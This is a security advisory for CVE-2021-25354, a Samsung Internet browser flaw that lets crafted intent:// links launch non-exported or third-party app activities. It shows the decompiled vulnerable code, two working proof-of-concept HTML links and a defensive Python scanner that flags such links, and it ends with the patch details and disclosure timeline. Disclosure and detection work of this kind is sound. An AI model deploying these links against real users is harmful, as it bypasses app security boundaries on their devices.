CVE-2021-25354 Details
Original post: https://labs.f-secure.com/advisories/open-activities-via-samsung-browser/
| Product | Android devices with Samsung Internet (prior to version 13.2.1.46) |
| Severity | Medium |
| CVE Reference | CVE-2021-25354 |
| Type | Application Security Bypass |
Description
F-Secure looked into exploiting the Samsung S20 device for Tokyo Pwn2Own 2020. An issue was discovered that allowed a specific browsable intent in Samsung Browser (com.sec.android.app.sbrowser) to either:
- Launch non-exported activities in the Samsung Browser application
- Launch an exported activity in any installed application
Note that while this issue was found on a Samsung Galaxy device, the Samsung Internet browser application is available on the Google Play store and can be installed on any Android device with access to said store. It was confirmed that this issue could be exploited on any Android device that had the Samsung Internet application installed.
Technical Details
The issue is due to the methods handleIntent and handleShareVia of the class com.sec.android.app.sbrowser.capsule.BixbySBrowserLauncherActivity. First, handleIntent does the following:
- Parses the passed intent and establishes the URI data from the intent's data
- Parses the URI data and establishes the list pathSegments from the URI's path segments
- If the first item in the list pathSegments is ShareVia, then the method handleShareVia is executed
private void handleIntent(final Intent intent) {
    final String action = intent.getAction();
    final Uri data = intent.getData();
    int n = 1;
    if ("android.intent.action.VIEW".equals(action) && data != null) {
        final String string = data.toString();
        final List pathSegments = data.getPathSegments();
        if ((this.mPathSegments = (List<String>)pathSegments) != null) {
            if (pathSegments.size() != 0) {
                final String pathSegments2 = this.getPathSegments(0);
                if (pathSegments2 == null) {
                    return;
                }
                Label_0738: {
                    switch (pathSegments2.hashCode()) {
                        ...
                        case -679124017: {
                            if (pathSegments2.equals("ShareVia")) {
                                n = 4;
                                break Label_0738;
                            }
                            break;
                        }
                        ...
                }
                switch (n) {
                    ...
                    case 4: {
                        this.handleShareVia();
                        break;
                    }
Next, handleShareVia does the following:
- Creates a new intent createIntentWithTargetTask
- Checks if the second item in the list pathSegments is result_type_success
- Checks if the third and fourth items in the list pathSegments are not null
- If the fourth item in the list pathSegments is not com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity, then assigns the following createIntentWithTargetTask extra values: packageName = the third item in the list pathSegments; activityName = the fourth item in the list pathSegments
- Starts the activity outlined in the intent createIntentWithTargetTask
private void handleShareVia() {
    String pathSegments = getPathSegments(1);
    if (pathSegments != null) {
        Intent createIntentWithTargetTask = createIntentWithTargetTask("com.sec.android.app.sbrowser.INTENT_SHARE_VIA");
        createIntentWithTargetTask.putExtra("resultType", pathSegments);
        if ("result_type_success".equals(pathSegments)) {
            String pathSegments2 = getPathSegments(2);
            String pathSegments3 = getPathSegments(3);
            if (pathSegments2 != null && pathSegments3 != null) {
                if (pathSegments3.equals("com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity") && !this.isWeChatAvailable()) {
                    Log.d("BixbyLauncherActivity", "WeChat is not installed!");
                    createIntentWithTargetTask.putExtra("resultType", "result_type_fail");
                } else {
                    // Attacker-controlled path segments become the target package and activity
                    createIntentWithTargetTask.putExtra("packageName", pathSegments2);
                    createIntentWithTargetTask.putExtra("activityName", pathSegments3);
                }
            } else {
                return;
            }
        ...
        try {
            getApplicationContext().startActivity(createIntentWithTargetTask);
        } catch (ActivityNotFoundException e) {
            Log.d("BixbyLauncherActivity", "[handleShareVia]" + e.toString());
        }
    }
}
Using this information, it is possible to create a custom intent that launches a specific activity:
intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/<package name>/<activity name>
The following example browsable intent link will launch the non-exported component com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity in the Samsung Browser application:
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
By replacing the appropriate fields, it is also possible to launch activities that are exported in other applications. The following browsable intent link will launch the exported component com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity:
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
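As an added triage example (not part of the F-Secure advisory or Samsung's code), the script below parses Chrome-style intent:// links the way handleIntent and handleShareVia consume their path segments, so a defender can flag links in a captured page that would reach the vulnerable branch and see whether the target is a component inside the browser itself or in another app. The sample HTML is constructed from the two advisory links plus one unrelated link.

```python
import re
from urllib.parse import urlsplit, unquote

SBROWSER = "com.sec.android.app.sbrowser"

# Constructed sample page: the two links from the advisory and one unrelated intent link.
SAMPLE_HTML = """
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
<a href="intent://example.com/open#Intent;scheme=https;package=com.example.app;end">unrelated</a>
"""

def parse_intent_url(url):
    """Split an intent:// link into host, decoded path segments and the
    key=value pairs of its #Intent;...;end fragment. Returns None if not intent://."""
    parts = urlsplit(url)
    if parts.scheme != "intent":
        return None
    # Android's Uri.getPathSegments() skips empty segments (e.g. the trailing slash).
    segments = [unquote(s) for s in parts.path.split("/") if s]
    params = {}
    frag = parts.fragment
    if frag.startswith("Intent;") and frag.endswith(";end"):
        for kv in frag[len("Intent;"):-len(";end")].split(";"):
            if "=" in kv:
                key, value = kv.split("=", 1)
                params[key] = value
    return {"host": parts.netloc, "segments": segments, "params": params}

def sharevia_target(url):
    """Return (package, activity) if the link reaches the unpatched handleShareVia()
    branch that copies path segments into packageName/activityName, else None."""
    parsed = parse_intent_url(url)
    if not parsed or parsed["params"].get("package") != SBROWSER:
        return None
    # Chrome uses android.intent.action.VIEW when no action is given; handleIntent requires VIEW.
    if parsed["params"].get("action", "android.intent.action.VIEW") != "android.intent.action.VIEW":
        return None
    seg = parsed["segments"]
    if len(seg) < 4 or seg[0] != "ShareVia" or seg[1] != "result_type_success":
        return None
    return seg[2], seg[3]

def scan_html(html):
    """Triage every href on a page; returns (package, activity, targets_browser_itself) per hit."""
    findings = []
    for href in re.findall(r'href="([^"]+)"', html):
        target = sharevia_target(href)
        if target:
            pkg, act = target
            findings.append((pkg, act, pkg == SBROWSER))
    return findings
```

A hit with targets_browser_itself set points at a non-exported browser component; any other package name means an exported activity of a third-party app is being reached through the browser.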
Remedial Action
Samsung has released Samsung Browser version 13.2.1.46 which fixes the issue outlined in this advisory. F-Secure recommends that users upgrade Samsung Browser to at least version 13.2.1.46.
Credits
This issue was discovered by Ken Gannon.
Timeline
| Date | Summary |
| --- | --- |
| 02/11/2020 | Issue disclosed to Samsung Mobile Security |
| 02/11/2020 | Issue assigned to a Samsung Security Analyst |
| 12/01/2021 | Follow up sent to Samsung |
| 17/01/2021 | Samsung confirms the vulnerability and rates it as a moderate risk issue |
| 09/02/2021 | Patch released, Samsung initiates process for bug bounty reward |
| 25/03/2021 | CVE Assigned |
| 26/03/2021 | Advisory Published |